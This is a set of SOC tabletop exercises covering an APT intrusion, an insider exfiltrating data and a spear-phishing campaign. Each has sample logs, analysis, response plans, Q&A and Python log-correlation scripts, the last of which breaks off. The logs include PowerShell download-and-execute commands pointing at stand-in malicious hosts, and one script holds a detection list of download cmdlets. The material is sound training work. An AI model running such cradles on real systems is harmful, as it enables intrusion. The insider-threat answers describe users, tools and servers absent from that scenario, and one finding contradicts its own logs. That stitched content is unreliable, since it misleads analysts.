
EXERCISE FOR SOC: ANALYSIS AND INCIDENT RESPONSE FLOW

BY IZZMIER IZZUDDIN

SCENARIO: ADVANCED PERSISTENT THREAT (APT) ACTIVITY DETECTED

Scenario: A SOC analyst detects potential suspicious activity indicating a sophisticated attack targeting the organization's infrastructure. The objective is to analyse logs, identify the threat and respond appropriately using a structured incident response plan.

BACKGROUND

Company: IzzTech Solutions
Industry: Financial Services
Network Infrastructure:

• Corporate network with segmented VLANs (HR, Finance, IT).
• Active Directory (AD) environment.
• Endpoint Detection and Response (EDR) deployed across devices.
• Cloud-based services (email, storage).

Threat Report: External threat intelligence indicates increased APT activity targeting
financial institutions.

EXERCISE OVERVIEW

1. Inject Simulated Logs: Provide detailed logs (below).
2. Conduct Analysis: Follow a structured approach for identifying the root cause.
3. Response Planning: Propose mitigation steps based on the findings.

LOGS

1. Firewall Logs

2025-01-16 08:23:12 INFO Accept TCP 203.0.113.25:54321 -> 192.168.10.15:3389 (Remote Desktop Protocol)
2025-01-16 08:24:45 ALERT Drop TCP 203.0.113.25:65432 -> 10.0.0.50:22 (SSH)
2025-01-16 08:30:09 INFO Accept TCP 198.51.100.12:443 -> 192.168.20.45:8080 (HTTP Proxy)
2025-01-16 08:31:33 ALERT Drop TCP 198.51.100.12:443 -> 192.168.30.15:1433 (SQL Server)
2025-01-16 08:35:21 INFO Accept TCP 203.0.113.25:12345 -> 192.168.40.10:445 (SMB)

2. SIEM Logs

2025-01-16 08:23:12 INFO Successful RDP login detected from 203.0.113.25 to 192.168.10.15 by user "izzmier".
2025-01-16 08:23:45 INFO Multiple failed SSH login attempts to 10.0.0.50 from 203.0.113.25.
2025-01-16 08:31:00 WARNING Large outbound data transfer initiated from 192.168.10.15 to 198.51.100.12.
2025-01-16 08:32:15 ALERT Suspicious file transfer via SMB from 192.168.10.15 to 192.168.40.10.
2025-01-16 08:34:50 ALERT Credential dumping tools executed on 192.168.10.15 by user "izzmier".
2025-01-16 08:35:30 INFO User "izzmier" privileges escalated to Domain Admin on 192.168.10.15.

3. Endpoint Detection Logs

2025-01-16 08:22:45 DETECTED PowerShell script executed by izzmier on 192.168.10.15. Script Content: "Download payload from hxxp://malicious-site.com/payload.exe and execute."
2025-01-16 08:34:10 DETECTED Malicious executable "payload.exe" launched on 192.168.10.15.
2025-01-16 08:34:30 ALERT Unauthorised modification of LSASS memory on 192.168.10.15.
2025-01-16 08:35:10 INFO File "data.zip" (500MB) created on 192.168.10.15 and moved via SMB to 192.168.40.10.

ANALYSIS AND ELABORATION

Step 1: Initial Detection

• Observation: Logs indicate an RDP connection initiated by an external IP (203.0.113.25) to an internal system (192.168.10.15) with credentials of "izzmier".
• Suspicion: Unauthorised access via valid credentials (potential credential theft).

Step 2: Investigate Lateral Movement

• Firewall Logs: Show SMB communication from 192.168.10.15 to 192.168.40.10.
• Endpoint Logs: Evidence of credential dumping via LSASS memory.
• Conclusion: The attacker used legitimate credentials to move laterally and dump additional credentials.

Step 3: Data Exfiltration

• SIEM Logs: Large data transfer from 192.168.10.15 to an external IP (198.51.100.12).
• Endpoint Logs: Data was compressed into a zip file before transfer.
• Conclusion: Data exfiltration is confirmed.

Step 4: Privilege Escalation

• SIEM Logs: User "izzmier" escalated privileges to Domain Admin.
• Endpoint Logs: Malicious PowerShell and executables executed.
• Conclusion: The attacker achieved high-level access.
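The four steps above can be run as a single correlation pass. The following Python script is an added example, not part of the original exercise: it parses the exercise's constructed firewall, SIEM and EDR lines, builds a per-host timeline and rates each host by which stages (initial access, credential access, exfiltration) appear together. The stage names, the severity scale and the RFC 1918 definition of "internal" are assumptions of the example.

```python
"""Correlate the exercise's firewall, SIEM and EDR lines into per-host attack timelines.
Added example; the log text is the constructed sample from the exercise, embedded so it runs offline."""
import ipaddress
import re
from collections import defaultdict, namedtuple

FIREWALL = """\
2025-01-16 08:23:12 INFO Accept TCP 203.0.113.25:54321 -> 192.168.10.15:3389 (Remote Desktop Protocol)
2025-01-16 08:24:45 ALERT Drop TCP 203.0.113.25:65432 -> 10.0.0.50:22 (SSH)
2025-01-16 08:30:09 INFO Accept TCP 198.51.100.12:443 -> 192.168.20.45:8080 (HTTP Proxy)
2025-01-16 08:31:33 ALERT Drop TCP 198.51.100.12:443 -> 192.168.30.15:1433 (SQL Server)
2025-01-16 08:35:21 INFO Accept TCP 203.0.113.25:12345 -> 192.168.40.10:445 (SMB)"""
SIEM = """\
2025-01-16 08:23:12 INFO Successful RDP login detected from 203.0.113.25 to 192.168.10.15 by user "izzmier".
2025-01-16 08:23:45 INFO Multiple failed SSH login attempts to 10.0.0.50 from 203.0.113.25.
2025-01-16 08:31:00 WARNING Large outbound data transfer initiated from 192.168.10.15 to 198.51.100.12.
2025-01-16 08:34:50 ALERT Credential dumping tools executed on 192.168.10.15 by user "izzmier".
2025-01-16 08:35:30 INFO User "izzmier" privileges escalated to Domain Admin on 192.168.10.15."""
EDR = """\
2025-01-16 08:34:10 DETECTED Malicious executable "payload.exe" launched on 192.168.10.15.
2025-01-16 08:34:30 ALERT Unauthorised modification of LSASS memory on 192.168.10.15.
2025-01-16 08:35:10 INFO File "data.zip" (500MB) created on 192.168.10.15 and moved via SMB to 192.168.40.10."""

# RFC 1918 is "internal" here. ipaddress.is_private is deliberately not used: it also treats the
# RFC 5737 documentation ranges the exercise uses for attacker IPs (203.0.113.x, 198.51.100.x) as private.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
IP = r"\d{1,3}(?:\.\d{1,3}){3}"
Event = namedtuple("Event", "ts source stage host raw")

# (stage, log source, pattern): 'host' is the internal system the event is attributed to;
# 'src'/'dst' are checked against INTERNAL_NETS for stages that only matter when traffic crosses the perimeter.
RULES = [
    ("initial_access", "firewall", re.compile(rf"Accept TCP (?P<src>{IP}):\d+ -> (?P<host>{IP}):(3389|445)\b")),
    ("initial_access", "siem", re.compile(rf"RDP login detected from (?P<src>{IP}) to (?P<host>{IP})")),
    ("brute_force", "siem", re.compile(rf"failed SSH login attempts to (?P<host>{IP}) from (?P<src>{IP})")),
    ("execution", "edr", re.compile(rf"Malicious executable .* launched on (?P<host>{IP})")),
    ("credential_access", "edr", re.compile(rf"modification of LSASS memory on (?P<host>{IP})")),
    ("credential_access", "siem", re.compile(rf"Credential dumping tools executed on (?P<host>{IP})")),
    ("privilege_escalation", "siem", re.compile(rf"escalated to Domain Admin on (?P<host>{IP})")),
    ("lateral_movement", "edr", re.compile(rf"created on (?P<host>{IP}) and moved via SMB to (?P<dst>{IP})")),
    ("exfiltration", "siem", re.compile(rf"outbound data transfer initiated from (?P<host>{IP}) to (?P<dst>{IP})")),
]
KILL_CHAIN = ("initial_access", "credential_access", "exfiltration")  # Steps 1-3 seen on one host


def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def parse(source: str, text: str) -> list:
    """Turn one log source into Events; perimeter stages require an external peer."""
    events = []
    for line in text.splitlines():
        for stage, rule_source, rx in RULES:
            m = rx.search(line) if rule_source == source else None
            if not m:
                continue
            g = m.groupdict()
            if "src" in g and not is_external(g["src"]):
                continue  # internal RDP/SSH is routine admin traffic in this exercise
            if stage == "exfiltration" and not is_external(g["dst"]):
                continue  # a transfer that stays inside is movement, not exfiltration
            events.append(Event(line[:19], source, stage, g["host"], line))
    return events


def build_timelines(events: list) -> dict:
    timelines = defaultdict(list)
    for e in events:
        timelines[e.host].append(e)
    return {h: sorted(evs, key=lambda e: e.ts) for h, evs in timelines.items()}  # sort is stable


def assess(timelines: dict) -> dict:
    """Per host: 'critical' when the whole KILL_CHAIN is present, 'high' for two or more stages,
    'medium' for one; 'sources' lists the independent log sources that corroborate the host."""
    report = {}
    for host, evs in timelines.items():
        stages = list(dict.fromkeys(e.stage for e in evs))  # first-seen order, deduplicated
        if all(s in stages for s in KILL_CHAIN):
            severity = "critical"
        else:
            severity = "high" if len(stages) >= 2 else "medium"
        report[host] = {"severity": severity, "stages": stages, "sources": sorted({e.source for e in evs})}
    return report


def run() -> dict:
    events = parse("firewall", FIREWALL) + parse("siem", SIEM) + parse("edr", EDR)
    return assess(build_timelines(events))


if __name__ == "__main__":
    for host, r in sorted(run().items()):
        print(f"{host:15} {r['severity']:8} {' -> '.join(r['stages'])}  [{', '.join(r['sources'])}]")
```

Only 192.168.10.15 reaches "critical" because it is the one host on which all three log sources agree; the hosts that only appear in a single perimeter event stay at "medium", which is the triage order the analyst would follow.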

INCIDENT RESPONSE PLAN

1. Containment:
o Isolate affected systems (192.168.10.15 and 192.168.40.10).
o Block external IPs (203.0.113.25 and 198.51.100.12).
2. Eradication:
o Terminate malicious processes (e.g., "payload.exe").
o Reset credentials for compromised accounts (e.g., "izzmier").
o Patch exploited vulnerabilities.
3. Recovery:
o Restore affected systems from backups.
o Conduct a thorough system and network scan to ensure no persistence
mechanisms remain.
4. Post-Incident:
o Document findings and share with stakeholders.
o Implement multi-factor authentication (MFA) and improved segmentation.
o Update incident response playbooks based on lessons learned.

DISCUSSION QUESTIONS WITH ANSWERS

1. What initial indicators raised suspicion of an attack?

• The firewall logs showing RDP access from an external IP (203.0.113.25) to an internal host (192.168.10.15) raised suspicion, especially since RDP should typically not be exposed to external networks.
• SIEM logs revealed a successful login using the "izzmier" account, followed by lateral movement and privilege escalation.
• Endpoint detection logs indicated malicious activity, such as PowerShell script execution and credential dumping.

2. How would you validate the authenticity of the "izzmier" credentials?

• Check login history to see if the same IP address (203.0.113.25) has been used
previously by "izzmier" or if it's an anomaly.
• Correlate authentication logs with MFA usage to determine if additional
authentication steps were bypassed.
• Review logs from the authentication server (e.g., Active Directory) for anomalies
like login attempts from unusual geographic locations or devices.
• Conduct a user verification by contacting "izzmier" to confirm if they initiated the
session or if their credentials were stolen.

3. What additional logs or data would be helpful in this analysis?

• DNS logs: To identify if the external IP (203.0.113.25) communicated with any known malicious domains.
• Proxy logs: To capture details about the outbound traffic, including the destination
and data transferred.
• Threat intelligence feeds: To cross-reference external IPs (203.0.113.25 and
198.51.100.12) with known indicators of compromise (IOCs).
• Email gateway logs: To check if phishing emails were used to compromise
"izzmier."
• Endpoint telemetry: To detect any additional tools or persistence mechanisms left
behind by the attacker.

4. What proactive measures could prevent such incidents in the future?

1. Harden RDP access:
o Use VPN for remote access instead of exposing RDP to the internet.
o Implement MFA for all RDP sessions.
2. Enhance monitoring and detection:
o Set up alerts for unusual login patterns, such as logins from foreign IPs or
privilege escalation activities.
o Deploy anomaly-based behavior monitoring to flag deviations from normal
user activity.
3. Credential security:
o Enforce complex password policies and regular password changes.
o Implement phishing-resistant MFA (e.g., FIDO2 tokens) to prevent stolen
credentials from being misused.
4. Network segmentation:
o Limit lateral movement by segregating critical resources into isolated VLANs.
o Use firewalls and access control lists (ACLs) to restrict communication
between segments.
5. Regular vulnerability management:
o Apply security patches promptly.
o Conduct periodic penetration tests to identify weaknesses.
6. Incident response readiness:
o Regularly test incident response playbooks through tabletop exercises and
simulations.
o Train SOC analysts on detecting advanced threats and using SIEM/EDR
effectively.

TABLETOP EXERCISE FOR SOC: INSIDER THREAT WITH DATA EXFILTRATION

Scenario: The SOC team receives an alert from the DLP (Data Loss Prevention) system
regarding unusual file transfer activity initiated by an internal employee. The objective is to
investigate whether the activity is malicious and respond accordingly.

BACKGROUND

Company: CloudIzz Solutions
Industry: Technology (Cloud Storage)
Network Infrastructure:

• Segmented network with specific VLANs for Engineering, HR, Finance and R&D.
• File storage servers located on a restricted R&D VLAN (192.168.50.0/24).
• Employees use managed laptops with EDR solutions.
• Centralised file transfer and collaboration tool (e.g., OneDrive).

Incident: A departing employee from the R&D department is suspected of exfiltrating proprietary information before their resignation date.

EXERCISE OVERVIEW

1. Inject Simulated Logs: Provide detailed logs below.
2. Conduct Analysis: Perform an investigation to determine the scope of the incident.
3. Response Planning: Suggest containment, eradication and mitigation steps.

LOGS

1. Proxy Logs

2025-01-16 10:03:12 User: alice.wong, Destination: file-share.cloudsync.com, File: "project_alpha_designs.pdf", Size: 5MB
2025-01-16 10:05:45 User: alice.wong, Destination: external-cloud.com, File: "client_data.zip", Size: 200MB
2025-01-16 10:08:30 User: alice.wong, Destination: external-cloud.com, File: "r&d_archive_2024.zip", Size: 1.5GB
2025-01-16 10:10:15 User: alice.wong, Destination: 198.51.100.55, Protocol: HTTP POST, Data Transferred: 500MB

2. SIEM Logs

2025-01-16 09:59:12 INFO User "alice.wong" logged in to workstation 192.168.50.12 from IP 192.168.50.110.
2025-01-16 10:00:45 ALERT File "r&d_archive_2024.zip" accessed from file server 192.168.50.50 by user "alice.wong".
2025-01-16 10:05:30 INFO Unauthorised tool "dataexfil_tool.exe" executed on 192.168.50.12.
2025-01-16 10:08:10 WARNING Large outbound file transfer (1.5GB) detected from 192.168.50.12 to external-cloud.com.
2025-01-16 10:09:00 INFO Privileges for "alice.wong" escalated to Admin on 192.168.50.12.

3. EDR Logs

2025-01-16 10:00:10 DETECTED File "dataexfil_tool.exe" downloaded by user "alice.wong" on 192.168.50.12.
2025-01-16 10:01:25 INFO USB device connected to 192.168.50.12.
2025-01-16 10:02:10 ALERT USB file transfer of "project_alpha_designs.pdf" completed (5MB).
2025-01-16 10:06:15 WARNING Clipboard monitoring: Sensitive text copied, containing keywords "client names".
2025-01-16 10:09:45 INFO Malicious process "dataexfil_tool.exe" attempted to bypass DLP controls.

ANALYSIS AND ELABORATION

Step 1: Initial Alert

• Observation: The proxy logs showed a significant data transfer to external-cloud.com and the SIEM flagged unauthorised tool execution.
• Suspicion: Possible insider threat involving Alice Wong in the R&D department.

Step 2: Investigate Employee Activity

• Proxy Logs: Revealed multiple large file transfers to external cloud storage and a
public IP (198.51.100.55).
• EDR Logs: Highlighted the use of "dataexfil_tool.exe" and USB activity, suggesting
attempts to exfiltrate sensitive data.
• SIEM Logs: Showed privilege escalation, further implicating Alice Wong.

Step 3: Data Exfiltration Methods

• USB Drive: File "project_alpha_designs.pdf" was transferred to an unknown device.
• Cloud Upload: Files "client_data.zip" and "r&d_archive_2024.zip" were uploaded to external-cloud.com.
• HTTP POST Request: 500MB of unknown data was transferred to an external IP.

Step 4: Insider Threat Confirmation

• Behavioral Analysis:
o Escalation of privileges to Admin before file access.
o Execution of a known data exfiltration tool.
o Clipboard monitoring detected sensitive text copied.
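The volume-and-destination reasoning of Steps 1 to 3, written as a DLP-style check. This Python script is an added example, not part of the original exercise: it parses the constructed proxy lines above, normalises the size units, aggregates bytes per user and destination, and flags unsanctioned destinations by volume and by raw-IP destination. Treating file-share.cloudsync.com as the approved collaboration service and the 100 MiB threshold are assumptions of the example.

```python
"""DLP-style review of the exercise's proxy lines: bytes per user and destination, with findings
for unsanctioned destinations. Added example; the proxy lines are the constructed sample from the
exercise, and SANCTIONED and THRESHOLD_BYTES are assumptions."""
import re
from collections import defaultdict
from datetime import datetime

PROXY = """\
2025-01-16 10:03:12 User: alice.wong, Destination: file-share.cloudsync.com, File: "project_alpha_designs.pdf", Size: 5MB
2025-01-16 10:05:45 User: alice.wong, Destination: external-cloud.com, File: "client_data.zip", Size: 200MB
2025-01-16 10:08:30 User: alice.wong, Destination: external-cloud.com, File: "r&d_archive_2024.zip", Size: 1.5GB
2025-01-16 10:10:15 User: alice.wong, Destination: 198.51.100.55, Protocol: HTTP POST, Data Transferred: 500MB"""

SANCTIONED = {"file-share.cloudsync.com"}  # assumption: the company's approved collaboration service
THRESHOLD_BYTES = 100 * 1024**2            # assumption: alert above 100 MiB to any unsanctioned destination
UNIT = {"B": 1, "KB": 1024, "MB": 1024**2, "GB": 1024**3, "TB": 1024**4}

# Both line shapes in the exercise end in a size field, named either "Size" or "Data Transferred".
LINE = re.compile(r"^(?P<ts>\S+ \S+) User: (?P<user>\S+), Destination: (?P<dest>[^,]+),"
                  r".*?(?:Size|Data Transferred): (?P<size>[\d.]+)\s*(?P<unit>[KMGT]?B)\s*$")
IP_LITERAL = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def to_bytes(size: str, unit: str) -> int:
    return int(float(size) * UNIT[unit.upper()])


def parse_proxy(text: str) -> list:
    events = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            raise ValueError(f"unparsed proxy line: {line!r}")  # fail loudly rather than undercount
        events.append({"ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), "user": m["user"],
                       "dest": m["dest"].strip(), "bytes": to_bytes(m["size"], m["unit"])})
    return events


def review(events: list) -> dict:
    """Per user: bytes per destination, total to unsanctioned destinations, the time window those
    transfers span, and findings. Reasons: 'volume' above THRESHOLD_BYTES, 'raw_ip' when the
    destination is a bare IP address (business SaaS traffic normally goes to a hostname)."""
    per_user = defaultdict(lambda: {"by_dest": defaultdict(int), "unsanctioned": []})
    for e in events:
        u = per_user[e["user"]]
        u["by_dest"][e["dest"]] += e["bytes"]
        if e["dest"] not in SANCTIONED:
            u["unsanctioned"].append(e)
    report = {}
    for user, u in per_user.items():
        findings = []
        for dest, total in u["by_dest"].items():
            if dest in SANCTIONED:
                continue
            reasons = [r for r, hit in (("volume", total > THRESHOLD_BYTES),
                                        ("raw_ip", bool(IP_LITERAL.match(dest)))) if hit]
            if reasons:
                findings.append({"destination": dest, "bytes": total, "reasons": reasons})
        times = [e["ts"] for e in u["unsanctioned"]]
        report[user] = {
            "by_dest": dict(u["by_dest"]),
            "unsanctioned_bytes": sum(e["bytes"] for e in u["unsanctioned"]),
            "unsanctioned_window_s": (max(times) - min(times)).total_seconds() if times else 0.0,
            "findings": findings,
        }
    return report


def run() -> dict:
    return review(parse_proxy(PROXY))


if __name__ == "__main__":
    for user, r in run().items():
        print(f"{user}: {r['unsanctioned_bytes'] / 1024**2:.0f} MiB to unsanctioned destinations "
              f"within {r['unsanctioned_window_s'] / 60:.1f} min")
        for f in r["findings"]:
            print(f"  {f['destination']:26} {f['bytes'] / 1024**2:8.0f} MiB  {', '.join(f['reasons'])}")
```

The 5 MB upload to the sanctioned share produces no finding, while the 1.7 GiB to external-cloud.com and the 500 MiB POST to a bare IP fall inside a four-and-a-half-minute window, which is the "multiple large transfers in quick succession" pattern the analysis relies on.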

INCIDENT RESPONSE PLAN

1. Containment

• Isolate Systems: Disconnect Alice Wong's workstation (192.168.50.12) from the network.
• Revoke Access: Immediately disable Alice Wong's Active Directory account and
remove admin privileges.
• Block Data Transfers: Block external-cloud.com and 198.51.100.55 at the proxy
and firewall levels.

2. Eradication

• Scan and Remove Malware: Run a full antivirus scan to remove "dataexfil_tool.exe" and other malicious artifacts.
• Audit USB Devices: Identify and retrieve the connected USB device for forensic
analysis.

3. Recovery

• Restore System State: Revert Alice Wong’s workstation to a clean state from a
known-good backup.
• Review File Server: Check for any modifications or deletions on the file server
(192.168.50.50).

4. Post-Incident Actions

• Conduct Employee Interviews: Question Alice Wong about the incident and
involve HR/legal for further steps.
• Enhance DLP Controls: Improve detection of unauthorised tools and increase
monitoring for large outbound file transfers.
• Security Awareness Training: Educate employees about insider threats and
acceptable use policies.
• Policy Update: Implement stricter controls on privilege escalation and external file
sharing.

DISCUSSION QUESTIONS AND ANSWERS

1. What were the key indicators of malicious activity in this scenario?

• Unauthorised Privilege Escalation: The use of PsExec to log in as the SYSTEM account is a clear indicator of privilege escalation, which was unauthorised.
• Lateral Movement: alice.jones moved across critical servers (from Server-DC01 to
Server-DB01 and Server-WEB01) without appropriate authorization, which is a key
indicator of potential malicious activity.
• Privilege Escalation Tools: The use of privilege escalation tools like Mimikatz on
Server-DB01 further supports the notion of malicious intent.
• Suspicious DNS Query: The DNS request to a suspicious domain (external.com)
indicates possible data exfiltration or communication with an external command-
and-control (C2) server.
• Rapid Escalation and Lateral Movement: The short time between escalations and
lateral movement across the network suggests malicious intent rather than normal
IT operations.

2. What steps would you take to confirm whether the data exfiltration was intentional
or accidental?

• Check File Access Logs: Analyse file access logs on the compromised systems to
determine if any sensitive data was accessed or transferred during the
unauthorised actions.
• Inspect Outbound Traffic: Review firewall logs and outbound network traffic for
signs of large file transfers or communication with external IP addresses (especially
those associated with known C2 servers or suspicious domains).
• Analyse DNS Queries: Investigate all DNS requests made during the incident,
especially the suspicious query to external.com, to identify any connections to
external destinations. If there was an attempt to connect to a known malicious
server, it could indicate intentional exfiltration.
• Review Endpoint and Server Activity: Examine logs from endpoint security tools
(EDR) and server-side tools for signs of data transfer, such as file uploads,
compressions or external device connections.
• Interview the Involved Individual: If possible, conduct an interview with
alice.jones to assess whether the actions were intentional or accidental. Her
explanation could provide insight into whether the activity was a result of a
legitimate administrative task or malicious intent.

3. How would you handle the legal and HR aspects of an insider threat investigation?

• Document Everything: Ensure all findings and actions are thoroughly documented,
including system logs, interview records and any other relevant data. This
documentation can serve as evidence if legal action is required.
• Legal Consultation: Involve legal counsel early in the investigation to ensure that
all actions taken are legally sound and compliant with company policies, especially
when dealing with potential data breaches, privileged access misuse or violations
of labor laws.
• Preserve Evidence: Make sure that evidence is properly preserved to avoid any
potential tampering. This includes preserving system logs, captured artifacts and
backup files in case they are required for further investigation or litigation.
• HR Collaboration: Work closely with HR to assess the situation from an
employment perspective. Ensure that the investigation respects the employee's
rights and confidentiality. Depending on the findings, HR may need to manage the
disciplinary process.
• Ensure Fairness and Transparency: Investigate the issue impartially, ensuring that
all involved parties are treated fairly. If the investigation suggests malicious intent,
the disciplinary process should be aligned with company policies and contractual
agreements.

4. What proactive measures can prevent future insider threats?

• Least Privilege Access Control: Implement and enforce a strict least privilege
access model, where users only have the minimum level of access required for their
roles. Regularly review and audit access permissions.
• Privileged Access Management (PAM): Deploy PAM solutions to control, monitor
and audit the use of privileged accounts. This can prevent unauthorised privilege
escalation and provide greater visibility into who is accessing critical systems.
• Employee Monitoring and Behavioral Analytics: Implement user and entity
behavior analytics (UEBA) to monitor users’ actions for signs of anomalous behavior
that could indicate malicious intent. Flagging unusual patterns can help detect
insider threats early.
• Data Loss Prevention (DLP) Systems: Use DLP tools to monitor and prevent the
unauthorised movement of sensitive data. Ensure that DLP policies are tailored to
monitor cloud, on-premises and endpoint data access.
• Endpoint Detection and Response (EDR): Implement EDR solutions that detect
suspicious activity on endpoints, such as the use of privilege escalation tools or
remote administrative tools that are not part of normal operations.
• Regular Employee Training: Conduct regular security awareness training for
employees to educate them on the risks of insider threats, how to spot suspicious
activities and the importance of adhering to security policies.
• Background Checks and Continuous Monitoring: Implement background checks
for employees in sensitive positions and continuously monitor their access and
activities as part of an overall insider threat mitigation strategy.

TABLETOP EXERCISE FOR SOC: ADVANCED PERSISTENT THREAT (APT) - SPEAR PHISHING ATTACK

Scenario: The SOC receives an alert indicating that multiple users within the Finance
department have received a spear-phishing email. The email contains a malicious
attachment, which, when opened, executed a PowerShell script that gained initial access
to the organization's network.

The goal is to investigate the attack, understand its scope and implement the appropriate
response actions.

BACKGROUND

Company: IzzFin Tech
Industry: Financial Services (Banking and Finance)
Network Infrastructure:

• Segmented network with Finance, HR, IT and Management VLANs.
• Sensitive financial data stored on centralised file servers (192.168.40.0/24).
• Endpoint protection is deployed across all devices (EDR solutions).
• Email filtering and anti-malware solutions in place.

Incident: The Finance department's internal systems are targeted with a spear-phishing
campaign and the attacker uses an Office document with embedded macros to deliver the
initial payload.

EXERCISE OVERVIEW

1. Inject Simulated Logs: Provide detailed logs below.
2. Conduct Analysis: Perform an investigation to determine the extent of the attack.
3. Response Planning: Suggest containment, eradication and mitigation steps.

LOGS

1. Email Logs

2025-01-15 08:30:22 Incoming email from external address: [email protected], Subject: "Invoice for Q4 - Immediate Payment Required"
2025-01-15 08:31:05 Email delivered to user "[email protected]" in Finance dept.
2025-01-15 08:35:20 User "izzuddin" opened attachment "Invoice_Q4.docx" containing embedded macros.
2025-01-15 08:36:15 User "izzuddin" allowed macros to run in "Invoice_Q4.docx".
2025-01-15 08:38:45 Email delivered to user "[email protected]" in Finance dept.
2025-01-15 08:40:05 User "mary.jones" opened attachment "Invoice_Q4.docx".

2. SIEM Logs

2025-01-15 08:35:10 INFO User "izzuddin" logged in from IP 192.168.20.110 (Finance VLAN).
2025-01-15 08:36:05 WARNING PowerShell script executed on "izzuddin" machine (192.168.20.110), Command: Invoke-Expression -Command "Invoke-WebRequest -Uri http://maliciousserver.com/payload.ps1 -OutFile C:\Temp\payload.ps1"
2025-01-15 08:38:30 INFO User "mary.jones" logged in from IP 192.168.20.112 (Finance VLAN).
2025-01-15 08:39:00 WARNING PowerShell script executed on "mary.jones" machine (192.168.20.112), Command: Invoke-Expression -Command "Invoke-WebRequest -Uri http://maliciousserver.com/payload.ps1 -OutFile C:\Temp\payload.ps1"
2025-01-15 09:00:50 INFO Outbound network traffic from "izzuddin" machine (192.168.20.110) to external IP 203.0.113.10, Port 80, Data Transferred: 350KB
2025-01-15 09:02:00 INFO Outbound network traffic from "mary.jones" machine (192.168.20.112) to external IP 203.0.113.10, Port 80, Data Transferred: 350KB
2025-01-15 09:05:10 INFO Lateral movement detected from "izzuddin" (192.168.20.110) to "iffah" (192.168.20.115) in Finance VLAN via SMB.

3. EDR Logs

2025-01-15 08:35:20 ALERT Malicious PowerShell activity detected on "izzuddin" machine (192.168.20.110).
2025-01-15 08:36:00 DETECTED PowerShell payload download initiated from http://maliciousserver.com/payload.ps1.
2025-01-15 08:37:30 ALERT Malware execution detected from C:\Temp\payload.ps1.
2025-01-15 08:39:00 ALERT Malicious PowerShell script detected on "mary.jones" machine (192.168.20.112).
2025-01-15 08:39:45 DETECTED PowerShell payload download initiated from http://maliciousserver.com/payload.ps1.
2025-01-15 09:00:15 ALERT Lateral movement detected on "izzuddin" machine (192.168.20.110), SMB connection to "iffah" (192.168.20.115).
2025-01-15 09:05:00 ALERT Privilege escalation attempt from "izzuddin" machine to "iffah" machine.

ANALYSIS AND ELABORATION

Step 1: Initial Compromise

• Email Logs: The spear-phishing email was sent to both "izzuddin" and "mary.jones"
with a malicious attachment ("Invoice_Q4.docx").
• EDR Logs: Both users executed the malicious PowerShell script from the
document, downloading the payload (payload.ps1).
• SIEM Logs: The PowerShell command (Invoke-WebRequest -Uri) indicates the
script downloaded the malicious payload from an external IP (203.0.113.10), which
is suspicious.

Step 2: Lateral Movement and Privilege Escalation

• SIEM Logs: Both "izzuddin" and "mary.jones" made outbound connections to the
external server and downloaded the payload.
• EDR Logs: Lateral movement was detected from "izzuddin" (192.168.20.110) to
"iffah" (192.168.20.115) via SMB, suggesting an attempt to spread the infection.
• Privileged Escalation: Privilege escalation attempts were logged, indicating that
the attacker is trying to elevate their access to gain more control over internal
systems.

Step 3: Malware Execution

• EDR Logs: The payload was executed on both "izzuddin" and "mary.jones"
machines, suggesting that the malware is successfully running on these endpoints.
• SMB Traffic: The malware attempted to use SMB for lateral movement, which is
common for spreading malware inside internal networks.
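Scoping the campaign described in Steps 1 to 3 from the SIEM lines, as an added Python example that is not part of the original exercise: it pulls the download cradle's URL, host and drop path out of each logged PowerShell command, groups the affected machines by payload URL to find the first victim and the spread time, and collects the external IP from the outbound-traffic lines into one IOC set. The list of cmdlets used to recognise a download cradle is an assumption of the example, and the payload URL is taken as http://maliciousserver.com/payload.ps1 as the exercise intends.

```python
"""Scope the spear-phishing campaign from the exercise's SIEM lines: extract the download
cradle's IOCs from each PowerShell command and group affected hosts by payload URL.
Added example; the log lines are the constructed sample from the exercise."""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlparse

# Raw string so the Windows paths keep their backslashes.
SIEM = r"""
2025-01-15 08:36:05 WARNING PowerShell script executed on "izzuddin" machine (192.168.20.110), Command: Invoke-Expression -Command "Invoke-WebRequest -Uri http://maliciousserver.com/payload.ps1 -OutFile C:\Temp\payload.ps1"
2025-01-15 08:38:30 INFO User "mary.jones" logged in from IP 192.168.20.112 (Finance VLAN).
2025-01-15 08:39:00 WARNING PowerShell script executed on "mary.jones" machine (192.168.20.112), Command: Invoke-Expression -Command "Invoke-WebRequest -Uri http://maliciousserver.com/payload.ps1 -OutFile C:\Temp\payload.ps1"
2025-01-15 09:00:50 INFO Outbound network traffic from "izzuddin" machine (192.168.20.110) to external IP 203.0.113.10, Port 80, Data Transferred: 350KB
2025-01-15 09:02:00 INFO Outbound network traffic from "mary.jones" machine (192.168.20.112) to external IP 203.0.113.10, Port 80, Data Transferred: 350KB
"""

IP = r"\d{1,3}(?:\.\d{1,3}){3}"
MACHINE = re.compile(rf'on "(?P<user>[^"]+)" machine \((?P<ip>{IP})\)')
COMMAND = re.compile(r"Command: (?P<cmd>.+)$")
URI = re.compile(r"-Uri\s+(?P<url>\S+)")
OUTFILE = re.compile(r'-OutFile\s+(?P<path>[^"\s]+)')
OUTBOUND = re.compile(rf'from "(?P<user>[^"]+)" machine \((?P<ip>{IP})\) to external IP (?P<dst>{IP}), Port (?P<port>\d+)')
# Assumption: cmdlets/methods whose presence next to a -Uri marks a download cradle.
DOWNLOAD_MARKERS = ("Invoke-WebRequest", "Invoke-RestMethod", "DownloadFile", "DownloadString")


def when(line: str) -> datetime:
    return datetime.strptime(line[:19], "%Y-%m-%d %H:%M:%S")


def extract_cradle(line: str):
    """Return the IOCs of a download cradle logged on this line, or None."""
    cmd, machine = COMMAND.search(line), MACHINE.search(line)
    if not (cmd and machine):
        return None
    command = cmd["cmd"]
    uri = URI.search(command)
    if not uri or not any(marker in command for marker in DOWNLOAD_MARKERS):
        return None
    out = OUTFILE.search(command)
    return {
        "ts": when(line), "user": machine["user"], "ip": machine["ip"],
        "url": uri["url"], "domain": urlparse(uri["url"]).hostname,
        "outfile": out["path"] if out else None,
        # Invoke-Expression around the download means the fetched content is meant to execute.
        "wrapped_in_iex": bool(re.search(r"Invoke-Expression|\biex\b", command, re.IGNORECASE)),
    }


def analyse(text: str) -> dict:
    cradles, outbound = [], []
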